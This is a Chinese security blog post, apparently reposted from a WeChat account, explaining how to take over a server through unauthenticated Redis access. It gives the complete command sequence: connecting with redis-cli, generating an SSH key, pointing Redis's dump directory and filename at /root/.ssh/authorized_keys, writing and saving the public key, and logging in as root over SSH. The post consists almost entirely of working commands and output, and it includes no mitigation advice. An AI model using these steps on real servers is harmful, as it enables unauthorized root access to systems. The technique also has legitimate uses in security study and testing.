Redis未授权访问导致服务器被控制

  • A+
所属分类:安全文章

通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!

    首先使用下列命令安装Redis tools:

[email protected]:~# apt-get install redis-tools


然后通过下列命令看是否是未授权访问:


[email protected]:~# redis-cli -h 10.198.131.1

10.198.131.1:6379>


然后我们可以使用免密登录的方式进行相关攻击:

    生成公钥:


[email protected]:~/.ssh# ssh-keygen -t rsa


[email protected]:~/.ssh# cat id_rsa.pub 

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn 


[email protected]:~/.ssh#


将公钥写入远程服务器:


[email protected]:~/.ssh# redis-cli -h 10.198.131.1


10.198.131.1:6379> CONFIG SET dir /root/.ssh/

OK

10.198.131.1:6379> CONFIG SET dbfilename authorized_keys

OK

10.198.131.1:6379> set xxxx "nnnssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn [email protected]"

OK

10.198.131.1:6379> save

OK

10.198.131.1:6379> exit


 使用ssh远程登录:

[email protected]:~/.ssh# ssh 10.198.131.1

Redis未授权访问导致服务器被控制

Redis未授权访问导致服务器被控制


更多飓风网络安全动态请关注:

Redis未授权访问导致服务器被控制


本文始发于微信公众号(飓风网络安全):Redis未授权访问导致服务器被控制

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: